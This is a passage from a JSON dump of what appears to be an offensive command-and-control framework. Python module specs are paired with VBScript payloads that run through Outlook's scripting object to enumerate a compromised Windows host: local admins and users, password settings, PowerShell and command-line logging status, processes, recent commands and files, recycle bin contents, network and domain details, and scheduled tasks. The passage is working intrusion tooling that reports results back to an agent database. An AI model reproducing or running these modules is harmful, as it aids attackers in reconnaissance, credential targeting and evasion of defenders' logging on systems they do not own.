self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_installedpowershell.txt", "content": "Function list_installedpowershell()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objReg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\t\r\n\tkeyps3 = \"SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine\"\r\n\tkeyps1 = \"SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine\"\r\n\r\n\tposhkey = \"SOFTWARE\\Microsoft\\PowerShell\"\r\n\tobjReg.EnumKey 2147483650, keyps1, arrSubKeys\r\n\tobjReg.GetStringValue 2147483650, keyps1, \"PowerShellVersion\", ver2\r\n\r\n\tobjReg.EnumKey 2147483650, keyps3, arrSubKeys\r\n\tobjReg.GetStringValue 2147483650, keyps3, \"PowerShellVersion\", ver3\r\n\r\n\tIf IsNull(ver3) Then\r\n\t\tIf IsNull(ver2) Then\r\n\t\t\tval = \"nothing\"\r\n\t\tElse\r\n\t\t\tval = ver2\r\n\t\tEnd If\r\n\tElse\r\n\t\tval = ver3\r\n\tEnd If\r\n\r\n\tlist_installedpowershell = \"PowerShell Version: \" & val & vbCrlf & vbCrLf\r\nEnd Function" }, { "path": "functions/enumerate/host/list_iprouting.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the IP Routing table using the Win32_IP4RouteTable and the Win32_IP4PersistedRouteTable classes.\n (Only a few selected attributes is dumped)\n Official documentation: \n - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4routetable \n - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4persistedroutetable\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: SELECT * FROM Win32_IP4RouteTable\n - Query: SELECT * FROM Win32_IP4PersistedRouteTable\n \"\"\"\n self.entry = 'list_iprouting'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_iprouting.txt", "content": "Function list_iprouting()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n Set objWMIService = objLocator.ConnectServer(\".\", \"\\root\\cimv2\")\r\n Set colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_IP4RouteTable\",,48) \r\n\r\n list_iprouting = \"----- DYNAMIC ROUTES -----\" & vbCrlf\r\n\tFor Each objItem in colItems\r\n list_iprouting = list_iprouting & \"Description: \" & objItem.Description & vbCrlf\r\n list_iprouting = list_iprouting & \"Interface Index: \" & objItem.InterfaceIndex & vbCrlf\r\n list_iprouting = list_iprouting & \"Metric: \" & objItem.Metric1 & vbCrlf\r\n list_iprouting = list_iprouting & \"Protocol: \" & objItem.Protocol & vbCrlf & vbCrlf\r\n\tNext\r\n\r\n list_iprouting = list_iprouting & \"----- PERSISTENT ROUTES -----\" & vbCrlf\r\n Set colItems2 = objWMIService.ExecQuery(\"SELECT * FROM Win32_IP4PersistedRouteTable\",,48)\r\n For Each objItem in colItems2\r\n list_iprouting = list_iprouting & \"Description: \" & objItem.Description & vbCrlf\r\n list_iprouting = list_iprouting & \"Metric: \" & objItem.Metric1 & vbCrlf\r\n\tNext\r\nEnd Function" }, { "path": "functions/enumerate/host/list_localadmins.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the local administrators on the host specified with the inMachine option\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: Select * from Win32_ComputerSystem\n - Query: SELECT * FROM Win32_GroupUser WHERE GroupComponent=Win32_Group.Domain=VARIABLE,Name='Administrators'\n \"\"\"\n self.entry = 'list_localadmins'\n self.depends = []\n self.options['host'] = {\n \"value\": \".\",\n \"required\": True,\n \"description\": \"The machine you want to list local admins from. It defaults to localhost using .\",\n \"handler\": quotedstring\n }\n super().__init__(templatepath)\n" }, { "path": "functions/enumerate/host/list_localadmins.txt", "content": "Function list_localadmins()\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer({{host}}, \"root\\cimv2\")\r\n\tSet colItems1 = objWMIService.ExecQuery( \"Select * from Win32_ComputerSystem\")\r\n\tFor each objItem in colItems1\r\n\t\t\tMachineName = objItem.Name\r\n\tNext\r\n\r\n\ttoreturn = toreturn & \"Administrators Group Membership on Machine : \" & MachineName & vbCrLf\r\n\ttoreturn = toreturn & \"-----Group Members------\" & vbCrLf\r\n\tSet colItems2 = objWMIService.ExecQuery(\"SELECT * FROM Win32_GroupUser WHERE GroupComponent=\"\"Win32_Group.Domain='\" & MachineName & \"',Name='Administrators'\"\"\") \r\n\r\n\tFor Each Path In colItems2\r\n\t\tNamesArray = Split(Path.PartComponent,\",\")\r\n\t\tstrMemberName = Replace(Replace(NamesArray(1),Chr(34),\"\"),\"Name=\",\"\")\r\n\t\tDomainNameArray = Split(NamesArray(0),\"=\")\r\n\t\tstrDomainName = Replace(DomainNameArray(1),Chr(34),\"\")\r\n\t\tIf strDomainName <> strComputerName Then\r\n\t\t\tstrMemberName = strDomainName & \"\\\" & strMemberName\r\n\t\tEnd If\r\n\ttoreturn = toreturn & strMemberName & vbCrLf\r\n\tNext\r\n\r\n\tlist_localadmins = toreturn & vbCrLf\r\nEnd Function" }, { "path": "functions/enumerate/host/list_localusers.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the local users on the current host\n\n It uses CreateObject(\"Wscript.Shell\")\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: \"SELECT * FROM Win32_UserAccount WHERE LocalAccount = True\"\n \"\"\"\n self.entry = 'list_localusers'\n self.depends = []\n super().__init__(templatepath)\n" }, { "path": "functions/enumerate/host/list_localusers.txt", "content": "Function list_localusers()\r\n\ton error resume next\r\n\tSet sh = window.external.OutlookApplication.CreateObject(\"Wscript.Shell\")\r\n\tcompname = sh.ExpandEnvironmentStrings(\"%COMPUTERNAME%\")\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n\r\n\ttoreturn = toreturn & \"Local users on Machine \" & compname & \" : \" & vbCrLf\r\n\tSet colUsers = objWMIService.ExecQuery(\"SELECT * FROM Win32_UserAccount WHERE LocalAccount = True\")\r\n\tFor Each objUser in colUsers\r\n\t\ttoreturn = toreturn & objUser.Name & vbCrLf\r\n\t\ttoreturn = toreturn & \"--Description: \" & objUser.Description & vbCrLf\r\n\t\ttoreturn = toreturn & \"--Disabled: \" & objUser.Disabled & vbCrLf\r\n\t\ttoreturn = toreturn & \"--FullName: \" & objUser.FullName & vbCrLf\r\n\t\ttoreturn = toreturn & \"--Lockout: \" & objUser.Lockout & vbCrLf\r\n\t\ttoreturn = toreturn & \"--PasswordChangeable: \" & objUser.PasswordChangeable & vbCrLf\r\n\t\ttoreturn = toreturn & \"--PasswordExpires: \" & objUser.PasswordExpires & vbCrLf\r\n\t\ttoreturn = toreturn & \"--PasswordRequired: \" & objUser.PasswordRequired & vbCrLf\r\n\t\ttoreturn = toreturn & vbCrLf\r\n\tNext\r\n\tlist_localusers = toreturn\r\nEnd Function" }, { "path": "functions/enumerate/host/list_logging.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates status of logging on the host. \n It figures out status on logging settings for:\n - ProcessCreationIncludeCmdLine\n - PowerShell Script Block Logging\n - PowerShell Transcript Logging\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumKey\n - ConnectServer(root\\cimv2).GetDWORDValue\n \"\"\"\n self.entry = 'list_logging'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_logging.txt", "content": "Function list_logging()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objReg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\r\n\t' Cmd Line Process Auditing\r\n\tkeycmdlog = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\"\r\n\tobjReg.EnumKey 2147483650, keycmdlog, arrSubKeys\r\n\tobjReg.GetDWORDValue 2147483650, keycmdlog, \"ProcessCreationIncludeCmdLine_Enabled\", isenabled\r\n\r\n\tIf IsNull(isenabled) Then\r\n\t\tval = \"Not Enabled\"\r\n\tElse\r\n\t\tIf isenabled > 0 Then\r\n\t\t\tval = \"Enabled!\"\r\n\t\tElse\r\n\t\t\tval = \"Not Enabled\"\r\n\t\tEnd If\r\n\tEnd If\r\n\r\n\tcmdaud = \"Command Line Proc Arg Auditing: \" & val & vbCrlf\r\n\r\n\t'Posh logging\r\n\tpslog = \"\"\r\n\tKeyPSLog1 = \"Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\"\r\n\tKeyPSLog2 = \"Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\"\r\n\tobjReg.EnumKey 2147483650, KeyPSLog1, arrSubkeys\r\n\tobjReg.GetDWORDValue 2147483650, KeyPSLog1, \"EnableScriptBlockLogging\", scriptlogging\r\n\tIf scriptlogging = 1 Then\r\n\t\tpslog = pslog & \"PowerShell Script Block Logging: Enabled\" & vbCrlf\r\n\tElse\r\n\t\tpslog = pslog & \"PowerShell Script Block Logging: Disabled\" & vbCrlf\r\n\tEnd If\r\n\r\n\tobjReg.EnumKey 2147483650, KeyPSLog2, arrSubkeys\r\n\tobjReg.GetDWORDValue 2147483650, KeyPSLog2, \"EnableTranscripting\", enabletranscripting\r\n\tobjReg.GetDWORDValue 2147483650, KeyPSLog2, \"OutputDirectory\", outputdirectory\r\n\tobjReg.GetDWORDValue 2147483650, KeyPSLog2, \"EnableInvocationHeader\", enableinvocationheader\r\n\r\n\tIf enabletranscripting = 1 Then\r\n\t\tpslog = pslog & \"PowerShell Transcription Logging: Enabled\" & vbCrlf\r\n\tElse\r\n\t\tpslog = pslog & \"PowerShell Transcription Logging: Disabled\" & vbCrlf\r\n\tEnd If\r\n\r\n\tIf outputdirectory = 1 Then\r\n\t\tpslog = pslog & \"PowerShell Output Directory: Enabled\" & vbCrlf\r\n\tElse\r\n\t\tpslog = pslog & \"PowerShell Output Directory: Disabled\" & vbCrlf\r\n\tEnd If\r\n\r\n\tIf enableinvocationheader = 1 Then\r\n\t\tpslog = pslog & \"PowerShell Invocation Header: Enabled\" & vbCrlf\r\n\tElse\r\n\t\tpslog = pslog & \"PowerShell Invocation Header: Disabled\" & vbCrlf\r\n\tEnd If\r\n\r\n\tlist_logging = cmdaud & vbCrLF & pslog & vbCrLF\r\nEnd Function" }, { "path": "functions/enumerate/host/list_mappeddrives.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the mapped drives on the host.\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: Select Name,ProviderName from Win32_MappedLogicalDisk\n \"\"\"\n self.entry = 'list_mappeddrives'\n self.depends = []\n super().__init__(templatepath)" }, { "path": "functions/enumerate/host/list_mappeddrives.txt", "content": "Function list_mappeddrives()\r\n On error resume next\r\n Set objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n Set objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n Set col = objWMIService.ExecQuery (\"Select Name,ProviderName from Win32_MappedLogicalDisk\")\r\n\r\n drives = \"Letter - Provider\" & vbCrLf\r\n For Each obj in col\r\n drives = drives & obj.Name & \" - \" & obj.ProviderName & vbCrLf\r\n Next\r\n list_mappeddrives = drives\r\nEnd Function" }, { "path": "functions/enumerate/host/list_networkcardinfo.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates all the information from the network cards. \n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: SELECT * FROM Win32_NetworkAdapterConfiguration\n \"\"\"\n self.entry = 'list_networkcardinfo'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_networkcardinfo.txt", "content": "Function list_networkcardinfo()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n Set objWMIService = objLocator.ConnectServer(\".\", \"\\root\\cimv2\")\r\n Set colNicConfigs = objWMIService.ExecQuery(\"SELECT * FROM Win32_NetworkAdapterConfiguration\",,48) \r\n\r\n\tFor Each NIC in colNicConfigs\r\n For Each nicAttribute in NIC.Properties_\r\n\t\t\tif Not (IsNull(nicAttribute.value) OR IsEmpty(nicAttribute.value)) Then\r\n if IsArray(nicAttribute) then\r\n nicResponse = nicResponse & nicAttribute.Name & \": \" & Join(nicAttribute, \", \") & vbCrLf\r\n else\r\n nicResponse = nicResponse & nicAttribute.Name & \": \" & nicAttribute.value & vbCrLf\r\n end if\r\n end if\r\n Next\r\n\tNext\r\n\tlist_networkcardinfo = nicResponse\r\nEnd Function" }, { "path": "functions/enumerate/host/list_networklogon.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates all the information from the Network login profile.\n Contains interesting information such as logon restrictions, logon scripts, number of logons and password age\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: SELECT * FROM Win32_NetworkLoginProfile\n \"\"\"\n self.entry = 'list_networklogon'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_networklogon.txt", "content": "Function list_networklogon()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n Set objWMIService = objLocator.ConnectServer(\".\", \"\\root\\cimv2\")\r\n Set colNetLogProfs = objWMIService.ExecQuery(\"SELECT * FROM Win32_NetworkLoginProfile\",,48) \r\n\r\n\tFor Each NIC in colNetLogProfs\r\n For Each netlogAttribute in NIC.Properties_\r\n\t\t\tif Not (IsNull(netlogAttribute.value) OR IsEmpty(netlogAttribute.value)) Then\r\n if IsArray(netlogAttribute) then\r\n netlogResponse = netlogResponse & netlogAttribute.Name & \": \" & Join(netlogAttribute, \", \") & vbCrLf\r\n else\r\n netlogResponse = netlogResponse & netlogAttribute.Name & \": \" & netlogAttribute.value & vbCrLf\r\n end if\r\n end if\r\n Next\r\n\tNext\r\n\tlist_networklogon = netlogResponse\r\nEnd Function" }, { "path": "functions/enumerate/host/list_ntdomaininfo.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates information about the domain the computer is joined to using WMI.\n Returns unknown if computer is in workgroup.\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: Select * from Win32_NTDomain\n \"\"\"\n self.entry = 'list_ntdomaininfo'\n self.depends = []\n super().__init__(templatepath)\n" }, { "path": "functions/enumerate/host/list_ntdomaininfo.txt", "content": "Function list_ntdomaininfo()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n\tSet colNTDomain = objWMIService.ExecQuery(\"Select * from Win32_NTDomain\")\r\n\r\n\tFor Each domain in colNTDomain\r\n For Each domAttribute in domain.Properties_\r\n if Not (IsNull(domAttribute.value) OR IsEmpty(domAttribute.value)) Then\r\n if IsArray(domAttribute) then\r\n ntinfo = ntinfo & domAttribute.Name & \": \" & Join(domAttribute, \", \") & vbCrLf\r\n else\r\n ntinfo = ntinfo & domAttribute.Name & \": \" & domAttribute.value & vbCrLf\r\n end if\r\n end if\r\n Next\r\n\tNext\r\n\t\tlist_ntdomaininfo = ntinfo\r\nEnd Function" }, { "path": "functions/enumerate/host/list_officearch.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the installed Office Architecture on the host. \n This module writes the result to agent in the database.\n It retrieves the bitness from the Path value under \n HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths\\\\outlook.exe.\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).GetStringValue\n \"\"\"\n self.entry = 'list_officearch'\n self.depends = []\n super().__init__(templatepath)\n \n def rethandler(self, agent, options, data):\n agent.officearch = data" }, { "path": "functions/enumerate/host/list_officearch.txt", "content": "Function list_officearch()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objreg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\tobjreg.GetStringValue 2147483650, \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\outlook.exe\", \"Path\", strPath\r\n\tif InStr(strPath, \"x86\") > 0 Then\r\n\t\tlist_officearch = \"x86\"\r\n\telse\r\n\t\tlist_officearch = \"x64\"\r\n\tend if\t\r\nEnd Function\r\n" }, { "path": "functions/enumerate/host/list_printers.py", "content": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Uses wscript.network to gather printer connections\n\n It uses Wscript.Network\n - EnumPrinterConnections\n \"\"\"\n self.entry = 'list_printers'\n self.depends = []\n super().__init__(templatepath)\n" }, { "path": "functions/enumerate/host/list_printers.txt", "content": "Function list_printers()\r\n\tOn error resume next\r\n\tSet wsh = window.external.OutlookApplication.CreateObject(\"Wscript.Network\")\r\n\tSet printers = wsh.EnumPrinterConnections\r\n\tFor i = 0 to printers.Count - 1 Step 2\r\n output = output & \"Printername: \" & printers.Item(i+1) & \" - Port: \" & printers.Item(i) & vbCrLf\r\n Next\r\n\tlist_printers = \"Found \" & printers.count & \" printers:\" & vbCrLf & output\r\nEnd Function" }, { "path": "functions/enumerate/host/list_processes.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates running processes on the host. \n It lists out:\n - PID\n - PPID\n - Arch based on virtual size (x86 set to less than 4094967296 Bytes, could be FP here) - Double check using operation-file-check_filearch\n - Process Name\n - Executable Path\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process\n \"\"\"\n self.entry = 'list_processes'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_processes.txt", "content": "Function list_processes()\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n\tSet col = objWMIService.ExecQuery (\"Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process\")\r\n\tprocs = \"PID\" & vbTab & \"PPID\" & vbTab & \"Arch\" & vbTab & \"ProcessName\" & vbTab & vbTab & vbTab & \"Executable Path\" & vbCrLf\r\n\tFor Each obj in col\r\n\t\tif obj.VirtualSize < 4000000000 Then\r\n\t\t\tprocarch = \"x86\"\r\n\t\t\tif obj.processid = \"0\" then\r\n\t\t\t\tprocarch = \"x64\"\r\n\t\t\tend if\r\n\t\t\tif obj.processid = \"4\" then\r\n\t\t\t\tprocarch = \"x64\"\r\n\t\t\tend if\r\n\t\telse\r\n\t\t\tprocarch = \"x64\"\r\n\t\tend if\r\n\t\tif obj.Name = \"Memory Compression\" Then\r\n\t\t\tprocarch = \"x64\"\r\n\t\tend if\r\n\t\tif obj.Name = \"Registry\" Then\r\n\t\t\tprocarch = \"x64\"\r\n\t\tend if\r\n\t\tprocs = procs & obj.ProcessId & vbTab & obj.ParentProcessId & vbTab & procarch & vbTab & obj.Name & vbTab & vbTab & vbTab & obj.ExecutablePath & vbCrLf\r\n\tNext\r\n\tlist_processes = procs\r\nEnd Function" }, { "path": "functions/enumerate/host/list_recentcommands.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates recent executed commands from the registry\n HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU\n\n It uses WbemScripting.SWbemNamedValueSet\n - Add.__ProviderArchitecture\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumValues\n - ConnectServer(root\\cimv2).GetStringValue\n - ConnectServer(root\\cimv2).GetExpandedStringValue\n - ConnectServer(root\\cimv2).GetBinaryValue\n - ConnectServer(root\\cimv2).GetDWORDValue\n - ConnectServer(root\\cimv2).GetMultiStringValue\n - ConnectServer(root\\cimv2).GetQWORDValue\n \"\"\"\n self.entry = 'list_recentcommands'\n self.depends = ['./helperFunctions/Getallregvalues.txt']\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_recentcommands.txt", "content": "Function list_recentcommands()\r\n\tOn error resume next\r\n\tlist_recentcommands = \"RECENT COMMANDS:\" & vbCrLf\r\n\tlist_recentcommands = list_recentcommands & GetAllRegValues(\"HKCU\", \"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\", 64, 2147483649)\r\nEnd Function" }, { "path": "functions/enumerate/host/list_recentfiles.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates all shortcuts in the MY_RECENT_DOCUMENTS / RECENT_FILES\n Resolved all shortcuts to the items and lists them out\n\n It uses WScript.Shell\n - CreateShortcut\n \n It uses Shell.Application\n - Namespace\n - Namespace().items\n \"\"\"\n self.entry = 'list_recentfiles'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_recentfiles.txt", "content": "Function list_recentfiles()\r\n\tOn error resume next\r\n\tConst MY_RECENT_DOCUMENTS = &H8&\r\n\trecentpaths = \"RECENT PATHS:\" & vbCrLf\r\n\tset WshShell = window.external.OutlookApplication.CreateObject(\"WScript.Shell\")\r\n\tSet objShell = window.external.OutlookApplication.CreateObject(\"Shell.Application\")\r\n\tSet objFolder = objShell.Namespace(MY_RECENT_DOCUMENTS)\r\n\tSet colItems = objFolder.Items\r\n\tFor Each objItem in colItems\r\n\t\tSet oShellLink = WshShell.CreateShortcut(objItem.path)\r\n\t\tif Len(oShellLink.TargetPath) = 0 then\r\n\t\telse\r\n\t\t\trecentpaths = recentpaths & oShellLink.TargetPath & vbCrLf\r\n\t\tend if\r\n\tNext\r\n\tlist_recentfiles = recentpaths\r\nEnd Function" }, { "path": "functions/enumerate/host/list_recyclebin.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n This module reads lists the content of the recycle bin\n for the current user. To download a file use get_file and \n use the long path in the output from this module.\n\n It uses CreateObject(\"Shell.Application\")\n \"\"\"\n self.entry = 'list_recyclebin'\n self.depends = []\n super().__init__(templatepath)\n" }, { "path": "functions/enumerate/host/list_recyclebin.txt", "content": "Function list_recyclebin()\r\n\tOn error resume next\r\n\tSet sa = window.external.OutlookApplication.CreateObject(\"Shell.Application\")\r\n\tSet items = sa.Namespace(10).Items()\r\n\toutput = \"Name - MB - FullPath\" & vbCrLF\r\n\tsizeround = 1048576\r\n\tx = 0\r\n\tDo until x = items.count\r\n\t\tfriendlysize = Round(items.item(x).size / sizeround, 1)\r\n\t\toutput = output & items.item(x).name & \" - \" & friendlysize & \" - \" & items.item(x).path & vbCrLF\r\n\t\tx=x+1\r\n\tLoop\r\n\r\n\tml1 = 0\r\n\tml2 = 0\r\n\tml3 = 0\r\n\r\n\tlines=split(output,vbcrlf)\r\n\tfor each line in lines\r\n\t\tparts = Split(line, \" - \")\r\n\t\tIf Len(parts(0)) > ml1 Then\r\n \tml1 = Len(parts(0))\r\n\t End If\r\n\t\tIf Len(parts(1)) > ml2 Then\r\n \tml2 = Len(parts(1))\r\n\t\tEnd If\r\n\t\tIf Len(parts(2)) > ml3 Then\r\n \tml3 = Len(parts(2))\r\n\t\tEnd If\r\n\tnext\r\n\r\n\tFor Each line In lines\r\n \tparts = Split(line, \" - \")\r\n \tspacesToAdd1 = ml1 - Len(parts(0))\r\n \tspacesToAdd2 = ml2 - Len(parts(1))\r\n \tspacesToAdd3 = ml3 - Len(parts(2))\r\n \tline = parts(0) & String(spacesToAdd1, \" \") & \" \" & parts(1) & String(spacesToAdd2, \" \") & \" \" & parts(2) & String(spacesToAdd3, \" \")\r\n \tlist_recyclebin = list_recyclebin & line & vbCrLF\r\n\tNext\r\nEnd Function" }, { "path": "functions/enumerate/host/list_scheduledtasks.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the scheduled tasks on the host. \n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(ROOT\\Microsoft\\Windows\\TaskScheduler)\n - Query: SELECT * FROM MSFT_ScheduledTask\n \"\"\"\n self.entry = 'list_scheduledtasks'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_scheduledtasks.txt", "content": "Function list_scheduledtasks()\r\n\tOn error resume next\r\n\tConst wbemFlagReturnImmediately = &h10\r\n\tConst wbemFlagForwardOnly = &h20\r\n\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer(\".\", \"ROOT\\Microsoft\\Windows\\TaskScheduler\")\r\n\tSet col = objWMIService.ExecQuery (\"SELECT * FROM MSFT_ScheduledTask\", \"WQL\", wbemFlagReturnImmediately + wbemFlagForwardOnly)\r\n\r\n\tFor Each objItem in col\r\n \tschedtasks = schedtasks & vbCrLf & \"TaskName: \" & objItem.TaskName\r\n \tschedtasks = schedtasks & vbCrLf & \"TaskPath: \" & objItem.TaskPath\r\n\t\tschedtasks = schedtasks & vbCrLf & \"Source: \" & objItem.Source\r\n \tschedtasks = schedtasks & vbCrLf & \"State: \" & objItem.State\r\n\t\tschedtasks = schedtasks & vbCrLf & \"URI: \" & objItem.URI\r\n\t\tschedtasks = schedtasks & vbCrLf & \"Author: \" & objItem.Author\r\n \tschedtasks = schedtasks & vbCrLf & \"Date: \" & objItem.Date\r\n\t\tschedtasks = schedtasks & vbCrLf & \"Description: \" & objItem.Description\r\n\r\n\t\tschedtasks = schedtasks & vbCrLf & \"Actions Details:\"\r\n\t\tFor Each objAction In objItem.Actions\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" ClassId: \" & objAction.ClassId\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" Data: \" & objAction.Data\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" Arguments: \" & objAction.Arguments\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" Execute: \" & objAction.Execute\r\n\t\tNext\r\n\r\n\t\tSet objPrincipal = objItem.Principal\r\n\t\tschedtasks = schedtasks & vbCrLf & \"Principal Details:\"\r\n\t\tschedtasks = schedtasks & vbCrLf & \" GroupId: \" & objPrincipal.GroupId\r\n\t\tschedtasks = schedtasks & vbCrLf & \" Id: \" & objPrincipal.Id\r\n\t\tschedtasks = schedtasks & vbCrLf & \" LogonType: \" & objPrincipal.LogonType\r\n\t\tschedtasks = schedtasks & vbCrLf & \" RunLevel: \" & objPrincipal.RunLevel\r\n\t\tschedtasks = schedtasks & vbCrLf & \" UserId: \" & objPrincipal.UserId\r\n\t\tschedtasks = schedtasks & vbCrLf & \" ProcessTokenSidType: \" & objPrincipal.ProcessTokenSidType\r\n\t\tSet objPrincipal = Nothing\r\n\t\tschedtasks = schedtasks & vbCrLf & \"SecurityDescriptor: \" & objItem.SecurityDescriptor\r\n\r\n\t\tSet objSettings = objItem.Settings\r\n\t\tschedtasks = schedtasks & vbCrLf & \"Settings Details:\"\r\n\t\tschedtasks = schedtasks & vbCrLf & \" 